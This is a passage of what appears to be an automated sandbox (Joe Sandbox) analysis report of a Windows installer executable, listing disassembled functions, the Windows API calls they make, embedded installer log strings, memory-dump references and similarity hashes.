                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777362489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777393263.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777505554.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                • Opcode ID: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
                                                                                                                                                                                                                                                                • Instruction ID: f61ffac979fbda5733e9df3da2bdae5977773398d3d4f9e0d67d11d125479468
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EFB09235181A00AADE614B00DF0AF457A62A764701F008079B245640B0CAB200E0DB08
                                                                                                                                                                                                                                                                Function 00403D85 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • KiUserCallbackDispatcher.NTDLL(?,0040574D), ref: 00403D8F
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777362489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777393263.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777505554.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CallbackDispatcherUser
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2492992576-0
                                                                                                                                                                                                                                                                • Opcode ID: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
                                                                                                                                                                                                                                                                • Instruction ID: d14db2bc66c636a64d409f7b36464c270e9f3e97be8c2f7aaa1954d4611ec3db
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8DA01275005500DBCF014B40EF048067A61B7503007108478F1810003086310420EB08

                                                                                                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                                                                                                Function 0040497C Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 470windowmemoryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003F9), ref: 00404993
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000408), ref: 004049A0
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 004049EF
                                                                                                                                                                                                                                                                • LoadBitmapW.USER32(0000006E), ref: 00404A02
                                                                                                                                                                                                                                                                • SetWindowLongW.USER32(?,000000FC,Function_000048CC), ref: 00404A1C
                                                                                                                                                                                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A2E
                                                                                                                                                                                                                                                                • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A42
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001109,00000002), ref: 00404A58
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A64
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404A74
                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 00404A79
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AA4
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404AB0
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B51
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404B74
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B85
                                                                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00404BAF
                                                                                                                                                                                                                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BBE
                                                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000005), ref: 00404BCF
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CCD
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D28
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D3D
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D61
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404D87
                                                                                                                                                                                                                                                                • ImageList_Destroy.COMCTL32(?), ref: 00404D9C
                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 00404DAC
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E1C
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001102,?,?), ref: 00404ECA
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404ED9
                                                                                                                                                                                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 00404EF9
                                                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000000), ref: 00404F49
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003FE), ref: 00404F54
                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000000), ref: 00404F5B
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777362489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777393263.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777505554.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                                                                                                                • String ID: $ @$M$N
                                                                                                                                                                                                                                                                • API String ID: 1638840714-3479655940
                                                                                                                                                                                                                                                                • Opcode ID: d31232896a0766ad2925f7f8dcaf29c8f657193e0fe6649208ba40017519f6b3
                                                                                                                                                                                                                                                                • Instruction ID: e2b6c32447eba08f07ab18e4c0942225b167af9b9c7e550a0b0592367213937f
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d31232896a0766ad2925f7f8dcaf29c8f657193e0fe6649208ba40017519f6b3
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 09026CB0900209AFEF209FA4CD45AAE7BB5FB84314F10413AF615B62E1D7B89D91DF58
                                                                                                                                                                                                                                                                Function 004044A5 Relevance: 33.6, APIs: 15, Strings: 4, Instructions: 300stringkeyboardCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003F0), ref: 004044F9
                                                                                                                                                                                                                                                                • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404507
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003FB), ref: 00404527
                                                                                                                                                                                                                                                                • GetAsyncKeyState.USER32(00000010), ref: 0040452E
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003F0), ref: 00404543
                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404554
                                                                                                                                                                                                                                                                • SetWindowTextW.USER32(?,?), ref: 00404583
                                                                                                                                                                                                                                                                • SHBrowseForFolderW.SHELL32(?), ref: 0040463D
                                                                                                                                                                                                                                                                • lstrcmpiW.KERNEL32(9732,00447240,00000000,?,?), ref: 0040467A
                                                                                                                                                                                                                                                                • lstrcatW.KERNEL32(?,9732), ref: 00404686
                                                                                                                                                                                                                                                                • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404696
                                                                                                                                                                                                                                                                • CoTaskMemFree.OLE32(00000000), ref: 00404648
                                                                                                                                                                                                                                                                  • Part of subcall function 00405C84: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403F81), ref: 00405C97
                                                                                                                                                                                                                                                                  • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                                                                                                                                                                                                                  • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                                                                                                                                                                                                                  • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                                                                                                                                                                                                                  • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                                                                                                                                                                                                                  • Part of subcall function 00403E74: lstrcatW.KERNEL32(00000000,00000000,0046A560,004C70A8,install.log,00405A9C,004C70A8,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006), ref: 00403E8F
                                                                                                                                                                                                                                                                • GetDiskFreeSpaceW.KERNEL32(00443238,?,?,0000040F,?,00443238,00443238,?,00000000,00443238,?,?,000003FB,?), ref: 00404759
                                                                                                                                                                                                                                                                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404774
                                                                                                                                                                                                                                                                  • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                                                                                                                                                                                                • SetDlgItemTextW.USER32(00000000,00000400,00409264), ref: 004047ED
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777362489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777393263.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777505554.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                                                                                                                                                                                                                                • String ID: 82D$9732$@rD$A
                                                                                                                                                                                                                                                                • API String ID: 3347642858-1130442037
                                                                                                                                                                                                                                                                • Opcode ID: c0e02fddfd6f2336b8cee43e087a4f5cb21d7496477502da2ed1e77ce6b2ef00
                                                                                                                                                                                                                                                                • Instruction ID: 5c5d6a603380bcdbc7d7d35b60f5621b43697e5e98684918e033f9398a36e476
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c0e02fddfd6f2336b8cee43e087a4f5cb21d7496477502da2ed1e77ce6b2ef00
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D1B1A4B1900209BBDB11AFA1CD85AAF7AB8EF45314F10847BF605B72D1D77C8A41CB59
                                                                                                                                                                                                                                                                Function 00406ED2 Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 270filestringCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                                                                                                                                                                                                                                                • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F30
                                                                                                                                                                                                                                                                • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FA9
                                                                                                                                                                                                                                                                • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FB5
                                                                                                                                                                                                                                                                • lstrcmpA.KERNEL32(name,?), ref: 00406FC7
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 004071E6
                                                                                                                                                                                                                                                                  • Part of subcall function 004062A3: lstrlenW.KERNEL32(Sleep(9732),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                                                                                                  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777362489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777393263.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777505554.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                                                                                                                                                                                                                                • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                                                                                                                                                                                                                                • API String ID: 1916479912-1189179171
                                                                                                                                                                                                                                                                • Opcode ID: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                                                                                                                                                                                                                                                • Instruction ID: 34713ba181b26839f7619e948cf229fd8716e5ee99c03f3e8673f79b0d3e70cf
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9091BF70D1412DAACF04EBA5DD909FEBBBAEF48301F00416AF592F72D0E6785A05DB64
                                                                                                                                                                                                                                                                Function 00406C9B Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 190filestringCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • DeleteFileW.KERNEL32(?,?,004C30A0), ref: 00406CB8
                                                                                                                                                                                                                                                                • lstrcatW.KERNEL32(0045C918,\*.*,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D09
                                                                                                                                                                                                                                                                • lstrcatW.KERNEL32(?,00408838,?,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D29
                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(?), ref: 00406D2C
                                                                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(0045C918,?), ref: 00406D40
                                                                                                                                                                                                                                                                • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E22
                                                                                                                                                                                                                                                                • FindClose.KERNEL32(?), ref: 00406E33
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • Delete: DeleteFile failed("%s"), xrefs: 00406DFD
                                                                                                                                                                                                                                                                • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EB0
                                                                                                                                                                                                                                                                • Delete: DeleteFile("%s"), xrefs: 00406DBC
                                                                                                                                                                                                                                                                • \*.*, xrefs: 00406D03
                                                                                                                                                                                                                                                                • RMDir: RemoveDirectory("%s"), xrefs: 00406E6F
                                                                                                                                                                                                                                                                • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406E93
                                                                                                                                                                                                                                                                • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E58
                                                                                                                                                                                                                                                                • Delete: DeleteFile on Reboot("%s"), xrefs: 00406DE0
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777362489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777393263.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777505554.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                                                                                                • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*
                                                                                                                                                                                                                                                                • API String ID: 2035342205-3294556389
                                                                                                                                                                                                                                                                • Opcode ID: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
                                                                                                                                                                                                                                                                • Instruction ID: 0ca3ec5a28b3c1cae8259a28e21d86b18febecd5c0179aed135e39ed79665852
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2D51E3315043056ADB20AB61CD46EAF37B89F81725F22803FF943751D2DB7C49A2DAAD
                                                                                                                                                                                                                                                                Function 004024FB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 133comCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CoCreateInstance.OLE32(00409B24,?,00000001,00409B04,?), ref: 0040257E
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777362489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777393263.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777505554.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CreateInstance
                                                                                                                                                                                                                                                                • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                                                                                                                                                                                                                                • API String ID: 542301482-1377821865
                                                                                                                                                                                                                                                                • Opcode ID: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
                                                                                                                                                                                                                                                                • Instruction ID: c24c797a6f187c751e7d972b1a807078ee58ffeb38f484aa28d094541f0f6205
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 02415E74A00205BFCF04EFA0CC99EAE7B79FF48314B20456AF915EB2E1C679A941CB54
                                                                                                                                                                                                                                                                Function 00402E18 Relevance: 1.5, APIs: 1, Instructions: 27fileCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402E27
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777362489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777393263.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777505554.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FileFindFirst
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1974802433-0
                                                                                                                                                                                                                                                                • Opcode ID: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
                                                                                                                                                                                                                                                                • Instruction ID: b91193b5dd17d351e639dca097a4c2443a83fae7855d8014906372cda19badf2
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4EE06D32600204AFD700EB749D45ABE736CDF01329F20457BF146F20D1E6B89A41976A
                                                                                                                                                                                                                                                                Function 004063AC Relevance: 70.3, APIs: 29, Strings: 11, Instructions: 256libraryloadermemoryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063BF
                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(?), ref: 004063CC
